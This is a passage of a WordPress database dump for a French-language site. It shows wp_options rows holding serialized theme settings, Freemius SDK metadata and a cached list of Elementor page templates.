}s:7:\"version\";i:2;}','yes'),(109,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1508766602;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(116,'WPLANG','fr_FR','yes'),(126,'can_compress_scripts','0','no'),(140,'_site_transient_timeout_wporg_theme_feature_list','1508777355','no'),(141,'_site_transient_wporg_theme_feature_list','a:3:{s:6:\"Layout\";a:7:{i:0;s:11:\"grid-layout\";i:1;s:10:\"one-column\";i:2;s:11:\"two-columns\";i:3;s:13:\"three-columns\";i:4;s:12:\"four-columns\";i:5;s:12:\"left-sidebar\";i:6;s:13:\"right-sidebar\";}s:8:\"Features\";a:20:{i:0;s:19:\"accessibility-ready\";i:1;s:10:\"buddypress\";i:2;s:17:\"custom-background\";i:3;s:13:\"custom-colors\";i:4;s:13:\"custom-header\";i:5;s:11:\"custom-menu\";i:6;s:12:\"editor-style\";i:7;s:21:\"featured-image-header\";i:8;s:15:\"featured-images\";i:9;s:15:\"flexible-header\";i:10;s:14:\"footer-widgets\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:9:{i:0;s:4:\"blog\";i:1;s:10:\"e-commerce\";i:2;s:9:\"education\";i:3;s:13:\"entertainment\";i:4;s:14:\"food-and-drink\";i:5;s:7:\"holiday\";i:6;s:4:\"news\";i:7;s:11:\"photography\";i:8;s:9:\"portfolio\";}}','no'),(144,'current_theme','Magzma','yes'),(145,'theme_mods_magzma','a:12:{i:0;b:0;s:18:\"nav_menu_locations\";a:3:{s:8:\"top-menu\";i:12;s:11:\"header-menu\";i:13;s:11:\"footer-menu\";i:0;}s:18:\"custom_css_post_id\";i:429;s:11:\"custom_logo\";i:892;s:20:\"magzma_facebook_link\";s:43:\"https://www.facebook.com/guineeinnovations/\";s:19:\"magzma_twitter_link\";s:34:\"https://twitter.com/Gn_innovations\";s:18:\"magzma_google_link\";s:0:\"\";s:19:\"magzma_youtube_link\";s:0:\"\";s:21:\"magzma_instagram_link\";s:0:\"\";s:15:\"magzma_logo_top\";s:0:\"\";s:18:\"magzma_logo_bottom\";s:0:\"\";s:26:\"magzma_head_container_size\";s:4:\"1170\";}','yes'),(146,'theme_switched','','yes'),(147,'fs_active_plugins','O:8:\"stdClass\":2:{s:7:\"plugins\";a:1:{s:25:\"../themes/magzma/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:5:\"1.2.2\";s:4:\"type\";s:5:\"theme\";s:9:\"timestamp\";i:1508766603;s:11:\"plugin_path\";s:6:\"magzma\";}}s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:6:\"magzma\";s:8:\"sdk_path\";s:25:\"../themes/magzma/freemius\";s:7:\"version\";s:5:\"1.2.2\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1508766603;}}','yes'),(148,'fs_debug_mode','','yes'),(149,'fs_accounts','a:5:{s:21:\"id_slug_type_path_map\";a:1:{i:695;a:3:{s:4:\"slug\";s:6:\"magzma\";s:4:\"type\";s:5:\"theme\";s:4:\"path\";s:87:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/themes/magzma/functions.php\";}}s:10:\"theme_data\";a:1:{s:6:\"magzma\";a:16:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:87:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/themes/magzma/functions.php\";}s:17:\"install_timestamp\";i:1508766603;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:5:\"1.2.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:3:\"1.1\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:30:\"guineeinnove.nimbasolution.com\";s:9:\"server_ip\";s:13:\"41.223.49.245\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1508766603;s:7:\"version\";s:3:\"1.1\";}s:15:\"prev_is_premium\";b:0;s:14:\"previous_theme\";s:15:\"twentyseventeen\";s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1508766614;s:7:\"version\";s:3:\"1.1\";}}}s:13:\"file_slug_map\";a:1:{s:6:\"magzma\";s:6:\"magzma\";}s:6:\"themes\";a:1:{s:6:\"magzma\";O:9:\"FS_Plugin\":16:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:6:\"Magzma\";s:4:\"slug\";s:6:\"magzma\";s:4:\"file\";s:6:\"magzma\";s:7:\"version\";s:3:\"1.1\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:7:\"is_live\";b:1;s:4:\"type\";s:5:\"theme\";s:10:\"public_key\";s:32:\"pk_c080c9ae0260782dc4190b35fd883\";s:10:\"secret_key\";N;s:2:\"id\";s:3:\"695\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"287319824d2096ea9eb0ce5c4cad2cd7\";}','yes'),(150,'widget_social_box-widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(151,'fs_api_cache','a:0:{}','yes'),(157,'wpcf7','a:2:{s:7:\"version\";s:5:\"4.9.1\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1508766637;s:7:\"version\";s:3:\"4.9\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(162,'_elementor_installed_time','1508766656','yes'),(163,'elementor_remote_info_templates_data','a:125:{i:0;a:12:{s:2:\"id\";s:4:\"2402\";s:5:\"title\";s:32:\"Homepage &#8211; Interior Design\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2017/09/Interior.png\";s:12:\"tmpl_created\";s:10:\"1506441447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"2\";s:16:\"popularity_index\";s:2:\"51\";s:11:\"trend_index\";s:2:\"26\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:1;a:12:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:16:\"Homepage – App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0004.png\";s:12:\"tmpl_created\";s:10:\"1470829868\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/homepage-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:18:\"[\"App\",\"Homepage\"]\";s:10:\"menu_order\";s:1:\"3\";s:16:\"popularity_index\";s:1:\"1\";s:11:\"trend_index\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:2;a:12:{s:2:\"id\";s:3:\"777\";s:5:\"title\";s:28:\"Homepage &#8211; Coffee Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/01/rest-home.jpg\";s:12:\"tmpl_created\";s:10:\"1485273092\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/homepage-coffee-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:41:\"[\"Coffee\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:1:\"4\";s:16:\"popularity_index\";s:2:\"38\";s:11:\"trend_index\";s:2:\"41\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:3;a:12:{s:2:\"id\";s:4:\"2404\";s:5:\"title\";s:24:\"Homepage &#8211; Product\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/09/product.png\";s:12:\"tmpl_created\";s:10:\"1506441452\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"5\";s:16:\"popularity_index\";s:2:\"50\";s:11:\"trend_index\";s:2:\"32\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:4;a:12:{s:2:\"id\";s:3:\"519\";s:5:\"title\";s:20:\"Homepage – Fitness\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0023.png\";s:12:\"tmpl_created\";s:10:\"1477388808\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:45:\"[\"Fitness\",\"Gym\",\"Health\",\"Homepage\",\"Sport\"]\";s:10:\"menu_order\";s:1:\"6\";s:16:\"popularity_index\";s:1:\"5\";s:11:\"trend_index\";s:1:\"4\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:5;a:12:{s:2:\"id\";s:3:\"492\";s:5:\"title\";s:21:\"Homepage – Law firm\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0024.png\";s:12:\"tmpl_created\";s:10:\"1477388365\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-law-firm/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:25:\"[\"Firm\",\"Homepage\",\"Law\"]\";s:10:\"menu_order\";s:1:\"7\";s:16:\"popularity_index\";s:1:\"4\";s:11:\"trend_index\";s:1:\"5\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:6;a:12:{s:2:\"id\";s:4:\"3451\";s:5:\"title\";s:39:\"Homepage &#8211; Goodness meal services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/11/goodness-featured-image.png\";s:12:\"tmpl_created\";s:10:\"1512054116\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/homepage-goodness-meal-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"8\";s:16:\"popularity_index\";s:3:\"125\";s:11:\"trend_index\";s:2:\"33\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:7;a:12:{s:2:\"id\";s:3:\"225\";s:5:\"title\";s:23:\"Homepage – Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0016.png\";s:12:\"tmpl_created\";s:10:\"1470829872\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:25:\"[\"Homepage\",\"Restaurant\"]\";s:10:\"menu_order\";s:1:\"9\";s:16:\"popularity_index\";s:1:\"2\";s:11:\"trend_index\";s:1:\"3\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:8;a:12:{s:2:\"id\";s:4:\"2152\";s:5:\"title\";s:26:\"Homepage &#8211; Cake Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-home.png\";s:12:\"tmpl_created\";s:10:\"1499774132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/homepage-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:39:\"[\"Cake\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:2:\"10\";s:16:\"popularity_index\";s:2:\"68\";s:11:\"trend_index\";s:2:\"84\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:9;a:12:{s:2:\"id\";s:4:\"1068\";s:5:\"title\";s:27:\"Homepage &#8211; Copywriter\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/copywriter.png\";s:12:\"tmpl_created\";s:10:\"1488805928\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-copywriter/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:25:\"[\"Copywriter\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"11\";s:16:\"popularity_index\";s:2:\"42\";s:11:\"trend_index\";s:2:\"39\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:10;a:12:{s:2:\"id\";s:3:\"181\";s:5:\"title\";s:23:\"Homepage &#8211; Agency\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0019.png\";s:12:\"tmpl_created\";s:10:\"1470826567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/homepage-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"12\";s:16:\"popularity_index\";s:1:\"3\";s:11:\"trend_index\";s:1:\"2\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:11;a:12:{s:2:\"id\";s:3:\"463\";s:5:\"title\";s:18:\"Homepage – Study\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0022.png\";s:12:\"tmpl_created\";s:10:\"1477388340\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/homepage-study/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:32:\"[\"Education\",\"Homepage\",\"Study\"]\";s:10:\"menu_order\";s:2:\"13\";s:16:\"popularity_index\";s:1:\"7\";s:11:\"trend_index\";s:1:\"8\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:12;a:12:{s:2:\"id\";s:4:\"2813\";s:5:\"title\";s:32:\"Homepage &#8211; Creative Agency\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/11/Creative-Agency-–-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1509615049\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-creative-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"14\";s:16:\"popularity_index\";s:2:\"53\";s:11:\"trend_index\";s:2:\"28\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:13;a:12:{s:2:\"id\";s:3:\"728\";s:5:\"title\";s:33:\"Homepage &#8211; Delivery Company\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/01/delivery-company-home-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485269993\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/homepage-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:23:\"[\"Delivery\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"15\";s:16:\"popularity_index\";s:2:\"41\";s:11:\"trend_index\";s:2:\"44\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:14;a:12:{s:2:\"id\";s:4:\"2403\";s:5:\"title\";s:29:\"Homepage &#8211; Luxury Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/09/Hotel.png\";s:12:\"tmpl_created\";s:10:\"1506441428\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/homepage-luxury-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"16\";s:16:\"popularity_index\";s:2:\"81\";s:11:\"trend_index\";s:2:\"52\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:15;a:12:{s:2:\"id\";s:4:\"1903\";s:5:\"title\";s:20:\"One Page &#8211; Spa\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/06/spa.png\";s:12:\"tmpl_created\";s:10:\"1496822325\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/one-page-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"17\";s:16:\"popularity_index\";s:2:\"46\";s:11:\"trend_index\";s:2:\"53\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:16;a:12:{s:2:\"id\";s:4:\"2123\";s:5:\"title\";s:33:\"One Page &#8211; Architect Office\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/06/architect.png\";s:12:\"tmpl_created\";s:10:\"1499772989\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/one-page-architect-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"18\";s:16:\"popularity_index\";s:2:\"16\";s:11:\"trend_index\";s:1:\"9\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:17;a:12:{s:2:\"id\";s:4:\"1888\";s:5:\"title\";s:32:\"One Page &#8211; Creative Meetup\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2017/06/creative-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822319\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/one-page-creative-meetup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"19\";s:16:\"popularity_index\";s:2:\"47\";s:11:\"trend_index\";s:2:\"55\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:18;a:12:{s:2:\"id\";s:4:\"1880\";s:5:\"title\";s:24:\"One Page &#8211; Wedding\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/06/wedding.png\";s:12:\"tmpl_created\";s:10:\"1496822317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/one-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"20\";s:16:\"popularity_index\";s:2:\"98\";s:11:\"trend_index\";s:2:\"99\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:19;a:12:{s:2:\"id\";s:4:\"1891\";s:5:\"title\";s:35:\"One Page &#8211; Textile Convention\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/06/textile-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822323\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/one-page-textile-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"21\";s:16:\"popularity_index\";s:2:\"89\";s:11:\"trend_index\";s:2:\"79\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:20;a:12:{s:2:\"id\";s:4:\"1885\";s:5:\"title\";s:29:\"One Page &#8211; Yacht Rental\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/06/yacht-home.png\";s:12:\"tmpl_created\";s:10:\"1496822321\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/one-page-yacht-rental/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"22\";s:16:\"popularity_index\";s:2:\"45\";s:11:\"trend_index\";s:2:\"69\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:21;a:12:{s:2:\"id\";s:4:\"2723\";s:5:\"title\";s:34:\"Portfolio &#8211; Graphic Designer\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/11/Graphic-Designer-–-Portfolio.png\";s:12:\"tmpl_created\";s:10:\"1509633883\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/portfolio-graphic-designer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"23\";s:16:\"popularity_index\";s:2:\"87\";s:11:\"trend_index\";s:2:\"40\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:22;a:12:{s:2:\"id\";s:4:\"2145\";s:5:\"title\";s:30:\"About &#8211; Delivery Compony\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-about.png\";s:12:\"tmpl_created\";s:10:\"1499774125\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/about-delivery-compony/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"24\";s:16:\"popularity_index\";s:2:\"86\";s:11:\"trend_index\";s:2:\"63\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:23;a:12:{s:2:\"id\";s:4:\"2155\";s:5:\"title\";s:23:\"About &#8211; Cake Shop\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-about.png\";s:12:\"tmpl_created\";s:10:\"1499774130\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/about-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"25\";s:16:\"popularity_index\";s:2:\"99\";s:11:\"trend_index\";s:2:\"93\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:24;a:12:{s:2:\"id\";s:4:\"1085\";s:5:\"title\";s:21:\"About &#8211; Startup\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/03/Startup.png\";s:12:\"tmpl_created\";s:10:\"1488810874\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/about-startup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:19:\"[\"About\",\"Startup\"]\";s:10:\"menu_order\";s:2:\"26\";s:16:\"popularity_index\";s:1:\"6\";s:11:\"trend_index\";s:1:\"6\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:25;a:12:{s:2:\"id\";s:3:\"143\";s:5:\"title\";s:18:\"About – Personal\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0010.png\";s:12:\"tmpl_created\";s:10:\"1470820447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-personal/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:20:\"[\"About\",\"Personal\"]\";s:10:\"menu_order\";s:2:\"27\";s:16:\"popularity_index\";s:2:\"14\";s:11:\"trend_index\";s:2:\"15\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:26;a:12:{s:2:\"id\";s:3:\"101\";s:5:\"title\";s:16:\"About &#8211; CV\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0018.png\";s:12:\"tmpl_created\";s:10:\"1470829785\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:98:\"https://library.elementor.com/about-cv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"28\";s:16:\"popularity_index\";s:2:\"21\";s:11:\"trend_index\";s:2:\"23\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:27;a:12:{s:2:\"id\";s:3:\"140\";s:5:\"title\";s:21:\"About – Art Gallery\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0009.png\";s:12:\"tmpl_created\";s:10:\"1470820463\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/about-art-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:25:\"[\"About\",\"Art\",\"Gallery\"]\";s:10:\"menu_order\";s:2:\"29\";s:16:\"popularity_index\";s:2:\"12\";s:11:\"trend_index\";s:2:\"13\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:28;a:12:{s:2:\"id\";s:3:\"213\";s:5:\"title\";s:22:\"About – Architecture\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0008.png\";s:12:\"tmpl_created\";s:10:\"1470829766\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/about-architecture/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:24:\"[\"About\",\"Architecture\"]\";s:10:\"menu_order\";s:2:\"30\";s:16:\"popularity_index\";s:2:\"10\";s:11:\"trend_index\";s:2:\"11\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:29;a:12:{s:2:\"id\";s:4:\"2802\";s:5:\"title\";s:38:\"Portfolio &#8211; Fashion Photographer\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2017/11/Fashion-photographer-–-Portfolio.png\";s:12:\"tmpl_created\";s:10:\"1509615440\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/portfolio-fashion-photographer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"31\";s:16:\"popularity_index\";s:3:\"102\";s:11:\"trend_index\";s:2:\"50\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:30;a:12:{s:2:\"id\";s:4:\"2828\";s:5:\"title\";s:35:\"Landing Page &#8211; Law Convention\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2017/11/Law-Convention-–-Landing-Page.png\";s:12:\"tmpl_created\";s:10:\"1509631636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/landing-page-law-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:35:\"[\"Convention\",\"Landing Page\",\"Law\"]\";s:10:\"menu_order\";s:2:\"32\";s:16:\"popularity_index\";s:3:\"119\";s:11:\"trend_index\";s:2:\"51\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:31;a:12:{s:2:\"id\";s:4:\"1461\";s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-1.png\";s:12:\"tmpl_created\";s:10:\"1494352121\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"33\";s:16:\"popularity_index\";s:2:\"66\";s:11:\"trend_index\";s:2:\"82\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:32;a:12:{s:2:\"id\";s:4:\"1460\";s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 